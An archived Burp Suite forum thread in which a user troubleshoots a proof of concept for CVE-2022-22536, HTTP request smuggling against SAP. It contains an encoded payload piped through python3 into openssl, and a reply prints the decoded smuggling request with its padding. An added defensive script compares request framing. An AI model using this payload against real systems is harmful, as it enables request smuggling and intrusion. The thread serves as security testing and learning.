The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Problem with openssl s_client through Burp Suite

Tobias | Last updated: Feb 21, 2022 10:00AM UTC

Hi all,

I've got a problem with a PoC for CVE-2022-22536 (https://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=CVE-2022-22536). If I use openssl with this command:

echo "H4sIAAAAAAACA42PMQ+CMBCFd39Fw6RGqEWChMSBECMDgwNuJgbwUhrx2rTF3y8Fjau53PK99y7vlBZol97pWBFqakXV0PSipU1LB01LyQXS2hiwhrZSN4Pz3HrJZaCQk6KqzpQF7KqvWEhjU8LCfbAdh6VJFO0cvxjQfsYBRzXvtHyCo7lEOyK/BOS2S0kSxlH8ERBaKySm5AGg/LoXryni1lst1Fw489YuE24I4P3g/YSvdfror4bz4Tfaao7SCQEAAA==" | base64 -d | gzip -d | python3 | openssl s_client -ign_eof -connect "127.0.0.1:8443"

the PoC works, but if I use the request directly in Burp it doesn't work. I tried to redirect the openssl request through Burp Suite:

echo "H4sIAAAAAAACA42PMQ+CMBCFd39Fw6RGqEWChMSBECMDgwNuJgbwUhrx2rTF3y8Fjau53PK99y7vlBZol97pWBFqakXV0PSipU1LB01LyQXS2hiwhrZSN4Pz3HrJZaCQk6KqzpQF7KqvWEhjU8LCfbAdh6VJFO0cvxjQfsYBRzXvtHyCo7lEOyK/BOS2S0kSxlH8ERBaKySm5AGg/LoXryni1lst1Fw489YuE24I4P3g/YSvdfror4bz4Tfaao7SCQEAAA==" | base64 -d | gzip -d | python3 | proxychains4 openssl s_client -ign_eof -connect "127.0.0.1:8443"

The request shows up in Burp, but the exploit doesn't work. This exploit uses a request smuggling attack, so I tried to disable all Burp functions which I think could prevent the successful attack, like update Content-Length, use HTTP2, etc. But I didn't find a solution.

Does anyone have any idea what I could test? Or what Burp adds to the valid openssl request so that it is no longer valid?

Best regards,
Tobi

Michelle, PortSwigger Agent | Last updated: Feb 22, 2022 01:58PM UTC

Thanks for your message. Do you have any extensions enabled in Burp when you are sending these requests? Is it just this particular PoC that fails, are other requests sent through Burp via this method working? Would you be happy to send some screenshots of what you see in Burp through to support@portswigger.net?

Joris | Last updated: Apr 04, 2022 08:16PM UTC

Hi Tobi,

Just saw the above post and unzipped and base64 decoded the payload and saw the content:

    print("GET /sap/public/bc/ur/Login/assets/corbu/sap_logo.png HTTP/1.1\r\nHost: 127.0.0.1:8443\r\nUser-Agent: Chrome\r\nContent-Length: 82646\r\nConnection: keep-alive\r\n\r\n")
    print("A"*82642, end="")
    print("\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:8443\r\n\r\n")

Trying to learn here, but why the 82642 * A? What is it for?

Joris
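For the question in the first post (what an intercepting proxy changes in a request), one way to check is to compare the raw bytes as sent with the raw bytes as forwarded, at the HTTP/1.1 framing level. This is an added example, not code from the thread or from PortSwigger; the function names `parse_stream` and `framing_diff`, the host `app.example` and both sample captures are constructed, and only Content-Length framing is handled.

```python
# Added example, not from the thread. Sample captures below are constructed.

def parse_stream(stream: bytes):
    """Frame a raw client-to-server byte stream as HTTP/1.1 requests using
    Content-Length only (no chunked encoding). Returns (messages, leftover)."""
    messages = []
    stream = stream.lstrip(b"\r\n")
    while b"\r\n\r\n" in stream:
        head, _, rest = stream.partition(b"\r\n\r\n")
        request_line, *header_lines = head.split(b"\r\n")
        headers = {}
        for line in header_lines:
            name, _, value = line.partition(b":")
            headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
        declared = int(headers.get("content-length", "0"))
        messages.append({"line": request_line.decode("latin-1"), "headers": headers,
                         "declared": declared, "present": min(declared, len(rest))})
        stream = rest[declared:].lstrip(b"\r\n")
    return messages, stream


def framing_diff(direct: bytes, proxied: bytes):
    """List framing-level differences between two captures of one request."""
    a_msgs, a_left = parse_stream(direct)
    b_msgs, b_left = parse_stream(proxied)
    out = []
    if len(a_msgs) != len(b_msgs):
        out.append(f"message count: {len(a_msgs)} vs {len(b_msgs)}")
    for i, (a, b) in enumerate(zip(a_msgs, b_msgs)):
        if a["line"] != b["line"]:
            out.append(f"[{i}] request line: {a['line']!r} vs {b['line']!r}")
        for name in sorted(set(a["headers"]) | set(b["headers"])):
            va, vb = a["headers"].get(name), b["headers"].get(name)
            if va != vb:
                out.append(f"[{i}] header {name}: {va!r} vs {vb!r}")
        for tag, m in (("direct", a), ("proxied", b)):
            if m["present"] < m["declared"]:
                out.append(f"[{i}] {tag}: body short by {m['declared'] - m['present']} bytes")
    if len(a_left) != len(b_left):
        out.append(f"unframed trailing bytes: {len(a_left)} vs {len(b_left)}")
    return out


# Constructed captures of the same request taken on each side of a proxy.
DIRECT = (b"POST /upload HTTP/1.1\r\nHost: app.example\r\n"
          b"Content-Length: 12\r\n\r\nhello")
PROXIED = (b"POST /upload HTTP/1.1\r\nHost: app.example\r\n"
           b"Content-Length: 5\r\nConnection: close\r\n\r\nhello")
```

Calling `framing_diff(DIRECT, PROXIED)` returns one line per difference: headers added or rewritten in transit, and any message whose declared Content-Length is larger than the bytes actually present.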

Joris | Last updated: Apr 04, 2022 08:18PM UTC